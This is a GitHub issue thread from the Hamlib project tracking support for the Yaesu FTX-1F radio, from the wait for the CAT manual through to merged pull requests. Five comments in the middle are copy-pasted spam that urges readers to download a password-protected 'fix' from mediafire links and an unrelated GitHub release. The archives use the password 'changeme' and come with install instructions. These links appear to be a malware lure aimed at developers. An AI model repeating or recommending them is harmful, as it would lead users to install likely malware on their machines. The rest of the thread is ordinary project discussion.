### ISSUE TITLE
Add Yaesu FTX-1F

### ISSUE THREAD

**Issue by mdblack98** [Hamlib/Hamlib#1600]
Waiting for CAT manual

**Comment by mdblack98** [comment]
From Yaesu:
Thank you for contacting us with your email. Unfortunately not all the details on the new radios capabilities are available yet. We are still a bit removed from the expected release date, so I would suggest maybe reach out to us again in a few months.


Best regards,

Juan Hernandez

Service Manager

[j.hernandez@yaesu.com](mailto:j.hernandez@yaesu.com)

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jeremybox** [comment]
Is there any way to assist without having a CAT manual, but having one in hand?  Happy to poll/pull info from the radio if it would help.

**Comment by jeremybox** [comment]
https://github.com/Hamlib/Hamlib/pull/1801 submitted.  Some features work, some don't.  Waiting on CAT manual, but it's a start.

**Comment by posimagi** [comment]
The manual is now available. I probably won't have time to implement support this week so if someone else wants to take it on, here it is.

https://www.yaesu.com/Files/4CB893D7-1018-01AF-FA97E9E9AD48B50C/FTX-1_CAT_OM_ENG_2507-A.pdf?ts=7/28/2025%202:07:02%20PM

**Comment by jeremybox** [comment]
https://github.com/Hamlib/Hamlib/pull/1826

**Comment by mikaelnousiainen** [comment]
I think this issue can be closed since we have FTX-1 support merged here: https://github.com/Hamlib/Hamlib/pull/1826 ?

**Comment by N0NB** [comment]
Agreed!
